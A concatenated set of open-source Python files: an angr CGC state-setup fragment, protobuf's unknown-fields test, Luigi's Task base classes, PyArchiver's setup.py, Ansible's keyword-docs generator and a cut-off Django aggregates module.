                    _l.error("What is this register %s I have to translate?", reg)

            # Update allocation base
            state.cgc.allocation_base = self.project.loader.main_object.current_allocation_base

            # Replay all recorded stdout writes as symbolic data, logging a
            # SimActionData for each so history matches the backer.
            writes_backer = self.project.loader.main_object.writes_backer
            stdout = state.posix.get_fd(1)
            pos = 0
            for size in writes_backer:
                if size == 0:
                    continue
                str_to_write = state.solver.BVS('file_write', size*8)
                a = SimActionData(
                    state,
                    'file_1_0',
                    'write',
                    addr=claripy.BVV(pos, state.arch.bits),
                    data=str_to_write,
                    size=size)
                stdout.write_data(str_to_write)
                state.history.add_action(a)
                pos += size
        else:
            # Set CGC-specific variables
            state.regs.eax = 0
            state.regs.ebx = 0
            state.regs.ecx = 0x4347c000
            state.regs.edx = 0
            state.regs.edi = 0
            state.regs.esi = 0
            state.regs.esp = 0xbaaaaffc
            state.regs.ebp = 0
            state.regs.cc_dep1 = 0x202  # default eflags
            state.regs.cc_op = 0  # OP_COPY
            state.regs.cc_dep2 = 0  # doesn't matter
            state.regs.cc_ndep = 0  # doesn't matter

            # fpu values
            state.regs.mm0 = 0
            state.regs.mm1 = 0
            state.regs.mm2 = 0
            state.regs.mm3 = 0
            state.regs.mm4 = 0
            state.regs.mm5 = 0
            state.regs.mm6 = 0
            state.regs.mm7 = 0
            state.regs.fpu_tags = 0
            state.regs.fpround = 0
            state.regs.fc3210 = 0x0300
            state.regs.ftop = 0

            # sse values
            state.regs.sseround = 0
            state.regs.xmm0 = 0
            state.regs.xmm1 = 0
            state.regs.xmm2 = 0
            state.regs.xmm3 = 0
            state.regs.xmm4 = 0
            state.regs.xmm5 = 0
            state.regs.xmm6 = 0
            state.regs.xmm7 = 0

            # segmentation registers
            state.regs.ds = 0
            state.regs.es = 0
            state.regs.fs = 0
            state.regs.gs = 0
            state.regs.ss = 0
            state.regs.cs = 0

        return state
| bsd-2-clause |
SOKP/external_chromium_org | third_party/protobuf/python/google/protobuf/internal/unknown_fields_test.py | 215 | 6585 | #! /usr/bin/python
# -*- coding: utf-8 -*-
#
# Protocol Buffers - Google's data interchange format
# Copyright 2008 Google Inc. All rights reserved.
# http://code.google.com/p/protobuf/
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Test for preservation of unknown fields in the pure Python implementation."""
__author__ = 'bohdank@google.com (Bohdan Koval)'
import unittest
from google.protobuf import unittest_mset_pb2
from google.protobuf import unittest_pb2
from google.protobuf.internal import encoder
from google.protobuf.internal import test_util
from google.protobuf.internal import type_checkers
class UnknownFieldsTest(unittest.TestCase):
  """Exercises preservation of unknown fields across parse, serialize,
  copy, merge, and comparison operations."""

  def setUp(self):
    # Serialize a fully populated TestAllTypes message, then parse it into
    # TestEmptyMessage so that every field lands in _unknown_fields.
    self.descriptor = unittest_pb2.TestAllTypes.DESCRIPTOR
    self.all_fields = unittest_pb2.TestAllTypes()
    test_util.SetAllFields(self.all_fields)
    self.all_fields_data = self.all_fields.SerializeToString()
    self.empty_message = unittest_pb2.TestEmptyMessage()
    self.empty_message.ParseFromString(self.all_fields_data)
    self.unknown_fields = self.empty_message._unknown_fields

  def GetField(self, name):
    # Find the unknown-field entry whose wire tag matches the named
    # TestAllTypes field, decode it with the known decoder, and return the
    # decoded value (None if no matching tag is present).
    field_descriptor = self.descriptor.fields_by_name[name]
    wire_type = type_checkers.FIELD_TYPE_TO_WIRE_TYPE[field_descriptor.type]
    field_tag = encoder.TagBytes(field_descriptor.number, wire_type)
    for tag_bytes, value in self.unknown_fields:
      if tag_bytes == field_tag:
        decoder = unittest_pb2.TestAllTypes._decoders_by_tag[tag_bytes]
        result_dict = {}
        decoder(value, 0, len(value), self.all_fields, result_dict)
        return result_dict[field_descriptor]

  def testVarint(self):
    value = self.GetField('optional_int32')
    self.assertEqual(self.all_fields.optional_int32, value)

  def testFixed32(self):
    value = self.GetField('optional_fixed32')
    self.assertEqual(self.all_fields.optional_fixed32, value)

  def testFixed64(self):
    value = self.GetField('optional_fixed64')
    self.assertEqual(self.all_fields.optional_fixed64, value)

  def testLengthDelimited(self):
    value = self.GetField('optional_string')
    self.assertEqual(self.all_fields.optional_string, value)

  def testGroup(self):
    value = self.GetField('optionalgroup')
    self.assertEqual(self.all_fields.optionalgroup, value)

  def testSerialize(self):
    data = self.empty_message.SerializeToString()

    # Don't use assertEqual because we don't want to dump raw binary data to
    # stdout.
    self.assertTrue(data == self.all_fields_data)

  def testCopyFrom(self):
    message = unittest_pb2.TestEmptyMessage()
    message.CopyFrom(self.empty_message)
    self.assertEqual(self.unknown_fields, message._unknown_fields)

  def testMergeFrom(self):
    # Unknown fields from the source must be appended after the
    # destination's own unknown fields.
    message = unittest_pb2.TestAllTypes()
    message.optional_int32 = 1
    message.optional_uint32 = 2
    source = unittest_pb2.TestEmptyMessage()
    source.ParseFromString(message.SerializeToString())

    message.ClearField('optional_int32')
    message.optional_int64 = 3
    message.optional_uint32 = 4
    destination = unittest_pb2.TestEmptyMessage()
    destination.ParseFromString(message.SerializeToString())
    unknown_fields = destination._unknown_fields[:]

    destination.MergeFrom(source)
    self.assertEqual(unknown_fields + source._unknown_fields,
                     destination._unknown_fields)

  def testClear(self):
    self.empty_message.Clear()
    self.assertEqual(0, len(self.empty_message._unknown_fields))

  def testByteSize(self):
    self.assertEqual(self.all_fields.ByteSize(), self.empty_message.ByteSize())

  def testUnknownExtensions(self):
    # Unknown extension fields behave identically to unknown regular fields.
    message = unittest_pb2.TestEmptyMessageWithExtensions()
    message.ParseFromString(self.all_fields_data)
    self.assertEqual(self.empty_message._unknown_fields,
                     message._unknown_fields)

  def testListFields(self):
    # Make sure ListFields doesn't return unknown fields.
    self.assertEqual(0, len(self.empty_message.ListFields()))

  def testSerializeMessageSetWireFormatUnknownExtension(self):
    # Create a message using the message set wire format with an unknown
    # message.
    raw = unittest_mset_pb2.RawMessageSet()

    # Add an unknown extension.
    item = raw.item.add()
    item.type_id = 1545009
    message1 = unittest_mset_pb2.TestMessageSetExtension1()
    message1.i = 12345
    item.message = message1.SerializeToString()

    serialized = raw.SerializeToString()

    # Parse message using the message set wire format.
    proto = unittest_mset_pb2.TestMessageSet()
    proto.MergeFromString(serialized)

    # Verify that the unknown extension is serialized unchanged
    reserialized = proto.SerializeToString()
    new_raw = unittest_mset_pb2.RawMessageSet()
    new_raw.MergeFromString(reserialized)
    self.assertEqual(raw, new_raw)

  def testEquals(self):
    # Messages differing only in unknown fields compare unequal.
    message = unittest_pb2.TestEmptyMessage()
    message.ParseFromString(self.all_fields_data)
    self.assertEqual(self.empty_message, message)

    self.all_fields.ClearField('optional_string')
    message.ParseFromString(self.all_fields.SerializeToString())
    self.assertNotEqual(self.empty_message, message)
if __name__ == '__main__':
unittest.main()
| bsd-3-clause |
bmaggard/luigi | luigi/task.py | 1 | 20793 | # -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
The abstract :py:class:`Task` class.
It is a central concept of Luigi and represents the state of the workflow.
See :doc:`/tasks` for an overview.
"""
try:
from itertools import imap as map
except ImportError:
pass
import logging
import traceback
import warnings
import json
import hashlib
import re
from luigi import six
from luigi import parameter
from luigi.task_register import Register
Parameter = parameter.Parameter
logger = logging.getLogger('luigi-interface')
def namespace(namespace=None):
    """
    Set the namespace applied to every task declared after this call.

    Calling with no argument, or with ``None``, clears the namespace again.
    Doing that at the end of any file that sets a namespace is recommended,
    since an active namespace would otherwise leak into tasks declared
    outside the scope of the current file.

    A task can also choose its namespace individually via the
    ``task_namespace`` class attribute, which needs no reset afterwards:

    .. code-block:: python

        class Task2(luigi.Task):
            task_namespace = 'namespace2'
    """
    Register._default_namespace = namespace
class BulkCompleteNotImplementedError(NotImplementedError):
    """Subclass used to trick pylint about ``bulk_complete``.

    pylint assumes anything raising ``NotImplementedError`` must be
    implemented in every subclass.  ``bulk_complete`` is optional, so raising
    this subclass instead lets pylint treat the default implementation as a
    valid one rather than an abstract method.
    """
    pass
@six.add_metaclass(Register)
class Task(object):
    """
    This is the base class of all Luigi Tasks, the base unit of work in Luigi.
    A Luigi Task describes a unit of work.

    The key methods of a Task, which must be implemented in a subclass, are:

    * :py:meth:`run` - the computation done by this task.
    * :py:meth:`requires` - the list of Tasks that this Task depends on.
    * :py:meth:`output` - the output :py:class:`Target` that this Task creates.

    Each :py:class:`~luigi.Parameter` of the Task should be declared as members:

    .. code:: python

        class MyTask(luigi.Task):
            count = luigi.IntParameter()
            second_param = luigi.Parameter()

    In addition to any declared properties and methods, there are a few
    non-declared properties, which are created by the :py:class:`Register`
    metaclass:

    ``Task.task_namespace``
      optional string which is prepended to the task name for the sake of
      scheduling. If it isn't overridden in a Task, whatever was last declared
      using `luigi.namespace` will be used.
    """
    # Maps handler-owning class -> {event name -> set of callbacks}; filled by
    # the ``event_handler`` decorator, consulted by ``trigger_event``.
    _event_callbacks = {}
    #: Priority of the task: the scheduler should favor available
    #: tasks with higher priority values first.
    #: See :ref:`Task.priority`
    priority = 0
    disabled = False
    #: Resources used by the task. Should be formatted like {"scp": 1} to indicate that the
    #: task requires 1 unit of the scp resource.
    resources = {}
    #: Number of seconds after which to time out the run function.
    #: No timeout if set to 0.
    #: Defaults to 0 or worker-timeout value in config file
    #: Only works when using multiple workers.
    worker_timeout = None

    @property
    def owner_email(self):
        '''
        Override this to send out additional error emails to task owner, in addition to the one
        defined in `core`.`error-email`. This should return a string or a list of strings. e.g.
        'test@example.com' or ['test1@example.com', 'test2@example.com']
        '''
        return None

    @property
    def use_cmdline_section(self):
        ''' Property used by core config such as `--workers` etc.
        These will be exposed without the class as prefix.'''
        return True

    @classmethod
    def event_handler(cls, event):
        """
        Decorator for adding event handlers.
        """
        def wrapped(callback):
            # Register under the class the decorator is accessed through, so a
            # handler on a base class also fires for its subclasses.
            cls._event_callbacks.setdefault(cls, {}).setdefault(event, set()).add(callback)
            return callback
        return wrapped

    def trigger_event(self, event, *args, **kwargs):
        """
        Trigger that calls all of the specified events associated with this class.
        """
        for event_class, event_callbacks in six.iteritems(self._event_callbacks):
            # Only fire handlers registered on this class or a superclass.
            if not isinstance(self, event_class):
                continue
            for callback in event_callbacks.get(event, []):
                try:
                    # callbacks are protected
                    callback(*args, **kwargs)
                except KeyboardInterrupt:
                    return
                except BaseException:
                    # A failing handler must not break the task itself.
                    logger.exception("Error in event callback for %r", event)

    @property
    def task_module(self):
        ''' Returns what Python module to import to get access to this class. '''
        # TODO(erikbern): we should think about a language-agnostic mechanism
        return self.__class__.__module__

    @property
    def task_family(self):
        """
        Convenience method since a property on the metaclass isn't directly accessible through the class instances.
        """
        return self.__class__.task_family

    @classmethod
    def get_params(cls):
        """
        Returns all of the Parameters for this Task.

        :return: list of ``(param_name, Parameter)`` tuples, sorted in
            parameter declaration order.
        """
        # We want to do this here and not at class instantiation, or else there is no room to extend classes dynamically
        params = []
        for param_name in dir(cls):
            param_obj = getattr(cls, param_name)
            if not isinstance(param_obj, Parameter):
                continue
            params.append((param_name, param_obj))
        # The order the parameters are created matters. See Parameter class
        params.sort(key=lambda t: t[1]._counter)
        return params

    @classmethod
    def get_param_values(cls, params, args, kwargs):
        """
        Get the values of the parameters from the args and kwargs.

        :param params: list of (param_name, Parameter).
        :param args: positional arguments
        :param kwargs: keyword arguments.
        :returns: list of `(name, value)` tuples, one for each parameter.
        """
        result = {}
        params_dict = dict(params)
        task_name = cls.task_family
        # In case any exceptions are thrown, create a helpful description of how the Task was invoked
        # TODO: should we detect non-reprable arguments? These will lead to mysterious errors
        exc_desc = '%s[args=%s, kwargs=%s]' % (task_name, args, kwargs)
        # Fill in the positional arguments
        positional_params = [(n, p) for n, p in params if p.positional]
        for i, arg in enumerate(args):
            if i >= len(positional_params):
                raise parameter.UnknownParameterException('%s: takes at most %d parameters (%d given)' % (exc_desc, len(positional_params), len(args)))
            param_name, param_obj = positional_params[i]
            result[param_name] = param_obj.normalize(arg)
        # Then the keyword arguments
        for param_name, arg in six.iteritems(kwargs):
            if param_name in result:
                raise parameter.DuplicateParameterException('%s: parameter %s was already set as a positional parameter' % (exc_desc, param_name))
            if param_name not in params_dict:
                raise parameter.UnknownParameterException('%s: unknown parameter %s' % (exc_desc, param_name))
            result[param_name] = params_dict[param_name].normalize(arg)
        # Then use the defaults for anything not filled in
        for param_name, param_obj in params:
            if param_name not in result:
                if not param_obj.has_task_value(task_name, param_name):
                    raise parameter.MissingParameterException("%s: requires the '%s' parameter to be set" % (exc_desc, param_name))
                result[param_name] = param_obj.task_value(task_name, param_name)

        def list_to_tuple(x):
            """ Make tuples out of lists and sets to allow hashing """
            if isinstance(x, list) or isinstance(x, set):
                return tuple(x)
            else:
                return x
        # Sort it by the correct order and make a list
        return [(param_name, list_to_tuple(result[param_name])) for param_name, param_obj in params]

    def __init__(self, *args, **kwargs):
        """
        Resolve parameter values from *args*/*kwargs* and compute ``task_id``.

        :raises parameter.MissingParameterException: if a required parameter
            has no value and no usable default.
        """
        params = self.get_params()
        param_values = self.get_param_values(params, args, kwargs)
        # Set all values on class instance
        for key, value in param_values:
            setattr(self, key, value)
        # Register args and kwargs as an attribute on the class. Might be useful
        self.param_args = tuple(value for key, value in param_values)
        self.param_kwargs = dict(param_values)
        # task_id is a concatenation of task family, the first values of the first 3 parameters
        # sorted by parameter name and a md5hash of the family/parameters as a canonicalised json.
        TASK_ID_INCLUDE_PARAMS = 3
        TASK_ID_TRUNCATE_PARAMS = 16
        TASK_ID_TRUNCATE_HASH = 10
        TASK_ID_INVALID_CHAR_REGEX = r'[^A-Za-z0-9_]'
        # Only significant parameters participate, so insignificant ones can
        # change without producing a different task_id.
        params = self.to_str_params(only_significant=True)
        param_str = json.dumps(params, separators=(',', ':'), sort_keys=True)
        param_hash = hashlib.md5(param_str.encode('utf-8')).hexdigest()
        param_summary = '_'.join(p[:TASK_ID_TRUNCATE_PARAMS]
                                 for p in (params[p] for p in sorted(params)[:TASK_ID_INCLUDE_PARAMS]))
        param_summary = re.sub(TASK_ID_INVALID_CHAR_REGEX, '_', param_summary)
        self.task_id = '{}_{}_{}'.format(self.task_family, param_summary, param_hash[:TASK_ID_TRUNCATE_HASH])
        self.__hash = hash(self.task_id)

    def initialized(self):
        """
        Returns ``True`` if the Task is initialized and ``False`` otherwise.
        """
        return hasattr(self, 'task_id')

    @classmethod
    def from_str_params(cls, params_str):
        """
        Creates an instance from a str->str hash.

        :param params_str: dict of param name -> value as string.
        """
        kwargs = {}
        for param_name, param in cls.get_params():
            if param_name in params_str:
                kwargs[param_name] = param.parse(params_str[param_name])
        return cls(**kwargs)

    def to_str_params(self, only_significant=False):
        """
        Convert all parameters to a str->str hash.

        :param only_significant: if ``True``, skip parameters whose
            ``significant`` flag is False.
        """
        params_str = {}
        params = dict(self.get_params())
        for param_name, param_value in six.iteritems(self.param_kwargs):
            if (not only_significant) or params[param_name].significant:
                params_str[param_name] = params[param_name].serialize(param_value)
        return params_str

    def clone(self, cls=None, **kwargs):
        """
        Creates a new instance from an existing instance where some of the args have changed.

        There's at least two scenarios where this is useful (see test/clone_test.py):

        * remove a lot of boiler plate when you have recursive dependencies and lots of args
        * there's task inheritance and some logic is on the base class

        :param cls: target class to instantiate; defaults to ``type(self)``.
        :param kwargs: parameter overrides applied on top of this task's values.
        :return: a new task instance of ``cls``.
        """
        k = self.param_kwargs.copy()
        k.update(six.iteritems(kwargs))
        if cls is None:
            cls = self.__class__
        new_k = {}
        # Only forward parameters that the target class actually declares.
        for param_name, param_class in cls.get_params():
            if param_name in k:
                new_k[param_name] = k[param_name]
        return cls(**new_k)

    def __hash__(self):
        # Precomputed in __init__ from task_id.
        return self.__hash

    def __repr__(self):
        """
        Build a task representation like `MyTask(param1=1.5, param2='5')`
        """
        params = self.get_params()
        param_values = self.get_param_values(params, [], self.param_kwargs)
        # Build up task id
        repr_parts = []
        param_objs = dict(params)
        for param_name, param_value in param_values:
            # Insignificant parameters are omitted from the repr.
            if param_objs[param_name].significant:
                repr_parts.append('%s=%s' % (param_name, param_objs[param_name].serialize(param_value)))
        task_str = '{}({})'.format(self.task_family, ', '.join(repr_parts))
        return task_str

    def __eq__(self, other):
        # Tasks are equal iff they are the same class with the same parameters.
        return self.__class__ == other.__class__ and self.param_args == other.param_args

    def complete(self):
        """
        If the task has any outputs, return ``True`` if all outputs exist.
        Otherwise, return ``False``.

        However, you may freely override this method with custom logic.
        """
        outputs = flatten(self.output())
        if len(outputs) == 0:
            # Without outputs there is nothing to check, so such a task is
            # never considered complete unless complete() is overridden.
            warnings.warn(
                "Task %r without outputs has no custom complete() method" % self,
                stacklevel=2
            )
            return False
        return all(map(lambda output: output.exists(), outputs))

    @classmethod
    def bulk_complete(cls, parameter_tuples):
        """
        Returns those of parameter_tuples for which this Task is complete.

        Override (with an efficient implementation) for efficient scheduling
        with range tools. Keep the logic consistent with that of complete().
        """
        raise BulkCompleteNotImplementedError()

    def output(self):
        """
        The output that this Task produces.

        The output of the Task determines if the Task needs to be run--the task
        is considered finished iff the outputs all exist. Subclasses should
        override this method to return a single :py:class:`Target` or a list of
        :py:class:`Target` instances.

        Implementation note
          If running multiple workers, the output must be a resource that is accessible
          by all workers, such as a DFS or database. Otherwise, workers might compute
          the same output since they don't see the work done by other workers.

        See :ref:`Task.output`
        """
        return []  # default impl

    def requires(self):
        """
        The Tasks that this Task depends on.

        A Task will only run if all of the Tasks that it requires are completed.
        If your Task does not require any other Tasks, then you don't need to
        override this method. Otherwise, a subclass can override this method
        to return a single Task, a list of Task instances, or a dict whose
        values are Task instances.

        See :ref:`Task.requires`
        """
        return []  # default impl

    def _requires(self):
        """
        Override in "template" tasks which themselves are supposed to be
        subclassed and thus have their requires() overridden (name preserved to
        provide consistent end-user experience), yet need to introduce
        (non-input) dependencies.

        Must return an iterable which among others contains the _requires() of
        the superclass.
        """
        return flatten(self.requires())  # base impl

    def process_resources(self):
        """
        Override in "template" tasks which provide common resource functionality
        but allow subclasses to specify additional resources while preserving
        the name for consistent end-user experience.
        """
        return self.resources  # default impl

    def input(self):
        """
        Returns the outputs of the Tasks returned by :py:meth:`requires`

        See :ref:`Task.input`

        :return: a list of :py:class:`Target` objects which are specified as
                 outputs of all required Tasks.
        """
        return getpaths(self.requires())

    def deps(self):
        """
        Internal method used by the scheduler.
        Returns the flattened list of requires.
        """
        # used by scheduler
        return flatten(self._requires())

    def run(self):
        """
        The task run method, to be overridden in a subclass.

        See :ref:`Task.run`
        """
        pass  # default impl

    def on_failure(self, exception):
        """
        Override for custom error handling.

        This method gets called if an exception is raised in :py:meth:`run`.
        The returned value of this method is json encoded and sent to the scheduler
        as the `expl` argument. Its string representation will be used as the
        body of the error email sent out if any.

        Default behavior is to return a string representation of the stack trace.
        """
        traceback_string = traceback.format_exc()
        return "Runtime error:\n%s" % traceback_string

    def on_success(self):
        """
        Override for doing custom completion handling for a larger class of tasks

        This method gets called when :py:meth:`run` completes without raising any exceptions.
        The returned value is json encoded and sent to the scheduler as the `expl` argument.
        Default behavior is to send a None value"""
        pass
class MixinNaiveBulkComplete(object):
    """
    Enables a Task to be efficiently scheduled with e.g. range tools, by
    providing a ``bulk_complete`` implementation that simply checks
    completeness of each parameter tuple in a loop.

    Applicable to tasks whose completeness checking is cheap.  It does not
    exploit any output-location-specific API for a speed advantage, but it
    still removes redundant scheduler roundtrips.
    """
    @classmethod
    def bulk_complete(cls, parameter_tuples):
        # Keep each tuple whose corresponding task instance reports complete.
        completed = []
        for parameter_tuple in parameter_tuples:
            if cls(parameter_tuple).complete():
                completed.append(parameter_tuple)
        return completed
def externalize(task):
    """
    Returns an externalized version of the Task.

    The task is modified in place: its ``run`` attribute is replaced with
    ``NotImplemented``, which marks it as produced outside of Luigi.
    See :py:class:`ExternalTask`.
    """
    task.run = NotImplemented
    return task
class ExternalTask(Task):
    """
    Subclass for references to external dependencies.

    An ExternalTask does not have a `run` implementation, which signifies to
    the framework that this Task's :py:meth:`output` is generated outside of
    Luigi.
    """
    # Sentinel value (rather than a method) signalling "cannot be run";
    # same mechanism as the externalize() helper above.
    run = NotImplemented
class WrapperTask(Task):
    """
    Use for tasks that only wrap other tasks and that by definition are done
    if all their requirements exist.
    """
    def complete(self):
        # Complete iff every flattened requirement reports complete.
        for requirement in flatten(self.requires()):
            if not requirement.complete():
                return False
        return True
class Config(Task):
    """
    Class for configuration. See :ref:`ConfigClasses`.
    """
    # TODO: let's refactor Task & Config so that it inherits from a common
    # ParamContainer base class
    # NOTE(review): structurally identical to a plain Task with no run/output;
    # presumably parameter values come from the config file -- confirm.
    pass
def getpaths(struct):
    """
    Maps all Tasks in a structured data object to their .output().

    Dicts and iterables are walked recursively; their shape is preserved.
    """
    if isinstance(struct, Task):
        return struct.output()
    elif isinstance(struct, dict):
        return dict((key, getpaths(value)) for key, value in six.iteritems(struct))
    else:
        # Remaining case: assume struct is iterable...
        try:
            children = list(struct)
        except TypeError:
            raise Exception('Cannot map %s to Task/dict/list' % str(struct))
        return [getpaths(child) for child in children]
def flatten(struct):
    """
    Creates a flat list of all items in structured output (dicts, lists, items):

    .. code-block:: python

        >>> sorted(flatten({'a': 'foo', 'b': 'bar'}))
        ['bar', 'foo']
        >>> sorted(flatten(['foo', ['bar', 'troll']]))
        ['bar', 'foo', 'troll']
        >>> flatten('foo')
        ['foo']
        >>> flatten(42)
        [42]
    """
    if struct is None:
        return []
    if isinstance(struct, dict):
        flat = []
        for _, value in six.iteritems(struct):
            flat.extend(flatten(value))
        return flat
    # Strings are atomic even though they are iterable.
    if isinstance(struct, six.string_types):
        return [struct]
    try:
        iterator = iter(struct)
    except TypeError:
        # Not iterable: a scalar flattens to a one-element list.
        return [struct]
    flat = []
    for element in iterator:
        flat.extend(flatten(element))
    return flat
def flatten_output(task):
    """
    Lists all output targets by recursively walking output-less (wrapper) tasks.

    FIXME order consistently.
    """
    outputs = flatten(task.output())
    if outputs:
        return outputs
    # No outputs of its own: gather them from the task's dependencies.
    for dep in flatten(task.requires()):
        outputs += flatten_output(dep)
    return outputs
| apache-2.0 |
Clivern/PyArchiver | setup.py | 1 | 1098 | """
PyArchiver Compression and Archiving Library
@author: Clivern U{hello@clivern.com}
"""
from setuptools import setup
from pyarchiver import __VERSION__
import os
# Utility function to read the README file.
def read(fname):
    """Return the contents of *fname*, resolved relative to this file's directory.

    Used to load README.md as the package's long description.

    :param fname: file name relative to the directory containing setup.py.
    :return: the file's full text content.
    """
    # Use a context manager so the handle is closed promptly; the original
    # left the file object open until garbage collection.
    with open(os.path.join(os.path.dirname(__file__), fname)) as f:
        return f.read()
# Package metadata; long_description is loaded from README.md via read().
setup(
    name = "pyarchiver",
    version = __VERSION__,
    author = "Clivern",
    author_email = "hello@clivern.com",
    description="Python Compression and Archiving Library",
    license = "MIT",
    keywords = "compression,archiving,tarfile,zipfile",
    url = "http://clivern.github.io/PyArchiver/",
    packages = ['pyarchiver'],
    long_description = read('README.md'),
    classifiers = [
        # Trove classifiers must be the bare classifier string; the original
        # "Classifier: " prefix is not a valid trove classifier and is
        # rejected by PyPI's metadata validation.
        'Development Status :: 5 - Production/Stable',
        'Topic :: Utilities',
        'License :: OSI Approved :: MIT License',
        # Support Python-2.x and Python-3.x
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3.2',
        'Programming Language :: Python :: 3.3',
        'Programming Language :: Python :: 3.4'
    ],
)
hryamzik/ansible | docs/bin/dump_keywords.py | 19 | 2987 | #!/usr/bin/env python
import optparse
import re
from distutils.version import LooseVersion
import jinja2
import yaml
from jinja2 import Environment, FileSystemLoader
from ansible.playbook import Play
from ansible.playbook.block import Block
from ansible.playbook.role import Role
from ansible.playbook.task import Task
# Renders playbooks_keywords.rst from the attributes declared on the core
# playbook object classes, optionally merging in human-written descriptions
# from a YAML docs file.
template_file = 'playbooks_keywords.rst.j2'
oblist = {}   # class name -> {attribute name -> description}
clist = []    # ordered list of class names, drives template section order
class_list = [Play, Role, Block, Task]

p = optparse.OptionParser(
    version='%prog 1.0',
    usage='usage: %prog [options]',
    description='Generate playbook keyword documentation from code and descriptions',
)
p.add_option("-T", "--template-dir", action="store", dest="template_dir", default="../templates", help="directory containing Jinja2 templates")
p.add_option("-o", "--output-dir", action="store", dest="output_dir", default='/tmp/', help="Output directory for rst files")
p.add_option("-d", "--docs-source", action="store", dest="docs", default=None, help="Source for attribute docs")
(options, args) = p.parse_args()

# Load the shared attribute documentation once up front; the original re-read
# and re-parsed the same YAML file for every class in class_list.
if options.docs:
    with open(options.docs) as f:
        docs = yaml.safe_load(f)
else:
    docs = {}

for aclass in class_list:
    aobj = aclass()
    name = type(aobj).__name__

    # build ordered list to loop over and dict with attributes
    clist.append(name)
    oblist[name] = dict((x, aobj.__dict__['_attributes'][x]) for x in aobj.__dict__['_attributes'] if 'private' not in x or not x.private)

    # pick up docs if they exist; iterate over a snapshot of the keys because
    # the alias branch below inserts and deletes entries while we loop.
    for a in list(oblist[name]):
        if a in docs:
            oblist[name][a] = docs[a]
        else:
            # check if there is an alias, otherwise undocumented
            alias = getattr(getattr(aobj, '_%s' % a), 'alias', None)
            if alias and alias in docs:
                oblist[name][alias] = docs[alias]
                del oblist[name][a]
            else:
                oblist[name][a] = ' UNDOCUMENTED!! '

    # loop is really with_ for users
    if name == 'Task':
        oblist[name]['with_<lookup_plugin>'] = 'The same as ``loop`` but magically adds the output of any lookup plugin to generate the item list.'

    # local_action is implicit with action
    if 'action' in oblist[name]:
        oblist[name]['local_action'] = 'Same as action but also implies ``delegate_to: localhost``'

    # remove unusable (used to be private?)
    for nouse in ('loop_args', 'loop_with'):
        if nouse in oblist[name]:
            del oblist[name][nouse]

env = Environment(loader=FileSystemLoader(options.template_dir), trim_blocks=True,)
template = env.get_template(template_file)
# NOTE(review): assumes output_dir ends with a path separator (the default
# '/tmp/' does); os.path.join would be safer but changes behavior for bare
# directory names -- confirm before changing.
outputname = options.output_dir + template_file.replace('.j2', '')
tempvars = {'oblist': oblist, 'clist': clist}

keyword_page = template.render(tempvars)
if LooseVersion(jinja2.__version__) < LooseVersion('2.10'):
    # jinja2 < 2.10's indent filter indents blank lines. Cleanup
    keyword_page = re.sub(' +\n', '\n', keyword_page)

with open(outputname, 'w') as f:
    f.write(keyword_page)
| gpl-3.0 |
NullSoldier/django | django/db/models/sql/aggregates.py | 57 | 4842 | """
Classes to represent the default SQL aggregate functions
"""
import copy
import warnings
from django.db.models.fields import FloatField, IntegerField
from django.db.models.lookups import RegisterLookupMixin
from django.utils.deprecation import RemovedInDjango110Warning
from django.utils.functional import cached_property
__all__ = ['Aggregate', 'Avg', 'Count', 'Max', 'Min', 'StdDev', 'Sum', 'Variance']
warnings.warn(
"django.db.models.sql.aggregates is deprecated. Use "
"django.db.models.aggregates instead.",
RemovedInDjango110Warning, stacklevel=2)
class Aggregate(RegisterLookupMixin):
    """
    Default SQL Aggregate.
    """
    is_ordinal = False
    is_computed = False
    sql_template = '%(function)s(%(field)s)'

    def __init__(self, col, source=None, is_summary=False, **extra):
        """Instantiate an SQL aggregate

        * col is a column reference describing the subject field
          of the aggregate. It can be an alias, or a tuple describing
          a table and column name.
        * source is the underlying field or aggregate definition for
          the column reference. If the aggregate is not an ordinal or
          computed type, this reference is used to determine the coerced
          output type of the aggregate.
        * extra is a dictionary of additional data to provide for the
          aggregate definition

        Also utilizes the class variables:

        * sql_function, the name of the SQL function that implements the
          aggregate.
        * sql_template, a template string that is used to render the
          aggregate into SQL.
        * is_ordinal, a boolean indicating if the output of this aggregate
          is an integer (e.g., a count)
        * is_computed, a boolean indicating if this output of this aggregate
          is a computed float (e.g., an average), regardless of the input
          type.
        """
        self.col = col
        self.source = source
        self.is_summary = is_summary
        self.extra = extra
        # Follow the chain of aggregate sources back until you find an
        # actual field, or an aggregate that forces a particular output
        # type. This type of this field will be used to coerce values
        # retrieved from the database.
        tmp = self
        while tmp and isinstance(tmp, Aggregate):
            if getattr(tmp, 'is_ordinal', False):
                tmp = self._ordinal_aggregate_field
